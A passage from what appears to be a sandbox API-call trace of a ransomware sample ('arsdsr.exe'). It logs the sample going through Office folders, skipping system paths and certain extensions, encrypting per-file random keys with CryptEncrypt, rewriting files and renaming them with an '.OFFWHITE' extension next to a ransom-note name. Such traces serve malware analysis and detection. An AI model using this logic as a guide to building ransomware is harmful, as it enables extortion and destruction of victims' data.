nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.579] GetLastError () returned 0x0 [0145.579] GetLastError () returned 0x0 [0145.579] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x2b2660, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.579] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.579] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x2b2760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.579] WriteFile (in: hFile=0x218, lpBuffer=0x546dd8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546dd8*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.579] GetProcessHeap () returned 0x500000 [0145.579] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x927c0) returned 0x2a60020 [0145.580] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.580] ReadFile (in: hFile=0x218, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x927c0, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295d1c0*=0x927c0, lpOverlapped=0x0) returned 1 [0145.662] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.662] WriteFile (in: hFile=0x218, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x927c0, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295d1cc*=0x927c0, lpOverlapped=0x0) returned 1 [0145.664] GetProcessHeap () returned 0x500000 [0145.665] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0145.670] CloseHandle (hObject=0x218) returned 1 [0145.670] GetProcessHeap () returned 0x500000 [0145.671] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.671] GetProcessHeap () returned 0x500000 [0145.671] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.671] GetProcessHeap () returned 0x500000 [0145.671] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.671] GetProcessHeap () returned 0x500000 [0145.671] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.671] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" [0145.671] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.OFFWHITE" [0145.671] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll.offwhite")) returned 1 [0145.672] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3564d600, ftCreationTime.dwHighDateTime=0x1cac7fb, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3564d600, ftLastWriteTime.dwHighDateTime=0x1cac7fb, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="OMSINTL.DLL.trx_dll", cAlternateFileName="OMSINT~1.TRX")) returned 1 [0145.672] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2=".") returned 1 [0145.672] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="..") returned 1 [0145.672] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="...") returned 1 [0145.672] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="windows") returned -1 [0145.672] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.672] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="rsa") returned -1 [0145.672] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0145.672] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="programdata") returned -1 [0145.672] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="appdata") returned 1 [0145.672] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="program files") returned -1 [0145.673] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0145.673] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.673] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="OMSINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" [0145.673] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.673] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.673] PathFindExtensionW (pszPath="OMSINTL.DLL.trx_dll") returned=".trx_dll" [0145.673] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.673] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.673] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.673] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.673] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.673] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.673] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.673] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.673] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.673] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.673] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.673] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.673] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.673] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.673] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.673] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.673] GetProcessHeap () returned 0x500000 [0145.674] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546de8 [0145.674] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.674] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=45920) returned 1 [0145.674] GetProcessHeap () returned 0x500000 [0145.674] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.674] GetProcessHeap () returned 0x500000 [0145.674] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.674] GetProcessHeap () returned 0x500000 [0145.674] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.674] GetProcessHeap () returned 0x500000 [0145.674] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.674] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.674] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.675] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.675] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.675] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.675] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.675] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.675] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.675] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.675] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.675] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.675] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.675] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xb360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.675] SetLastError (dwErrCode=0x0) [0145.675] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.679] GetLastError () returned 0x0 [0145.679] GetLastError () returned 0x0 [0145.679] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xb460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.679] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.679] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xb560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.679] WriteFile (in: hFile=0x218, lpBuffer=0x546de8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546de8*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.679] GetProcessHeap () returned 0x500000 [0145.679] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xb360) returned 0x5607c8 [0145.680] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.680] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0xb360, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0xb360, lpOverlapped=0x0) returned 1 [0145.684] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.684] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0xb360, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0xb360, lpOverlapped=0x0) returned 1 [0145.684] GetProcessHeap () returned 0x500000 [0145.684] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.684] CloseHandle (hObject=0x218) returned 1 [0145.684] GetProcessHeap () returned 0x500000 [0145.684] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.684] GetProcessHeap () returned 0x500000 [0145.685] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.685] GetProcessHeap () returned 0x500000 [0145.685] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.685] GetProcessHeap () returned 0x500000 [0145.685] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.685] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" [0145.685] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.OFFWHITE" [0145.685] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll.offwhite")) returned 1 [0145.686] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x63b88300, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x63b88300, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x7b60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="ONINTL.DLL.trx_dll", cAlternateFileName="ONINTL~1.TRX")) returned 1 [0145.686] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2=".") returned 1 [0145.686] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="..") returned 1 [0145.686] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="...") returned 1 [0145.686] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="windows") returned -1 [0145.686] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.686] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="rsa") returned -1 [0145.686] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0145.686] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="programdata") returned -1 [0145.686] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="appdata") returned 1 [0145.686] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="program files") returned -1 [0145.686] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0145.686] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.686] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="ONINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" [0145.686] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.686] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.686] PathFindExtensionW (pszPath="ONINTL.DLL.trx_dll") returned=".trx_dll" [0145.686] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.686] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.686] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.686] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.686] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.686] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.687] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.687] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.687] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.687] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.687] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.687] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.687] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.687] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.687] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.687] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.687] GetProcessHeap () returned 0x500000 [0145.687] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546df8 [0145.687] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.687] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=31584) returned 1 [0145.687] GetProcessHeap () returned 0x500000 [0145.687] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.687] GetProcessHeap () returned 0x500000 [0145.688] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.688] GetProcessHeap () returned 0x500000 [0145.688] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.688] GetProcessHeap () returned 0x500000 [0145.688] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.688] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.688] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.688] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.688] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.688] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.688] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.688] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.688] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.688] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.688] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.688] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.688] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.689] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x7b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.689] SetLastError (dwErrCode=0x0) [0145.689] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.691] GetLastError () returned 0x0 [0145.691] GetLastError () returned 0x0 [0145.691] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x7c60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.691] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.691] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x7d60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.691] WriteFile (in: hFile=0x218, lpBuffer=0x546df8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546df8*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.691] GetProcessHeap () returned 0x500000 [0145.691] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x7b60) returned 0x5607c8 [0145.691] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.691] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x7b60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x7b60, lpOverlapped=0x0) returned 1 [0145.695] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.695] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x7b60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x7b60, lpOverlapped=0x0) returned 1 [0145.695] GetProcessHeap () returned 0x500000 [0145.695] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.695] CloseHandle (hObject=0x218) returned 1 [0145.695] GetProcessHeap () returned 0x500000 [0145.695] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.695] GetProcessHeap () returned 0x500000 [0145.695] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.695] GetProcessHeap () returned 0x500000 [0145.695] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.695] GetProcessHeap () returned 0x500000 [0145.695] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.695] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" [0145.695] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.OFFWHITE" [0145.695] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll.offwhite")) returned 1 [0145.699] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x62875600, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x62875600, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x3d960, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="ONINTL.REST.trx_dll", cAlternateFileName="ONINTL~2.TRX")) returned 1 [0145.699] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2=".") returned 1 [0145.699] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="..") returned 1 [0145.699] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="...") returned 1 [0145.699] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="windows") returned -1 [0145.699] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0145.699] lstrcmpiW 